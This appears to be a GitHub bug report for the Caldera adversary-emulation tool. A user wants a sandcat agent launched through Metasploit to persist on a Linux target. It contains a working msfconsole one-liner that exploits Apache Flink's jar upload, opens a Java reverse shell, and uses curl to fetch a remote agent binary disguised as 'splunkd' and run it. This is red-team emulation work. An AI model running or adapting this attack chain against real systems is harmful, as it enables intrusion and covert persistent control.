Attempting to achieve lateral movement using sandcat agent and metasploit #2957

@NoorElAlfi

Hello,

I am trying to use Caldera alongside Metasploit to achieve lateral movement on a Linux target host. I've managed to get a Metasploit one-line command to achieve a reverse shell and run a sandcat agent on the target host. This is the command I've been using that works through the terminal:

msfconsole -q -x "use exploit/multi/http/apache_flink_jar_upload_exec; \
set rhosts x.x.x.x; \
set payload java/shell_reverse_tcp; \
exploit -j; \
sessions -i 1 -c 'curl -s -X POST -H \"file:sandcat.go\" -H \"platform:linux\" \"http://x.x.x.x:8888\"/file/download > splunkd'; \
sessions -i 1 -c 'chmod +x splunkd'; \
sessions -i 1 -c './splunkd -server \"http://x.x.x.x:8888\" -group red -v; &";  

Bug Description
Whenever I attempt to run this through the Caldera web server using a sandcat agent, I either get an "stty: 'standard input': Inappropriate ioctl for device" error, or the command actually goes through and starts the sandcat agent on the target host but is short-lived as a result of the process being killed due to a timeout. I've attempted to mitigate the second issue by running the agent in the background using an &, but the process still gets killed anyway. Is there any way I can have the sandcat agent persist on the target host without worrying about the command timing out? (Screenshots of the errors are below in the Screenshots section.)

To Reproduce
Steps to reproduce the behavior:

  1. Run an instance of Caldera on an attacking Linux host with Metasploit installed, and using a sandcat agent, I load the Metasploit abilities onto Caldera using the access plugin.
  2. I generate an adversary consisting of the reverse shell exploit I'm using. I update the command to the one above and hardcode the target host's IP into the command for testing purposes.
  3. I run the operation using the adversary I just generated through the sandcat agent. The reverse shell is achieved and the sandcat agent is briefly started, just to be killed due to timeout or the "stty: 'standard input': Inappropriate ioctl for device" error.

Expected behavior
I am wanting the command to be considered successful by the operation status, and the sandcat agent to persist on the target host without the process being killed.

Screenshots
error1
error2

Desktop:

  • OS: Ubuntu 18.04
  • Browser: Chromium

Labels: bug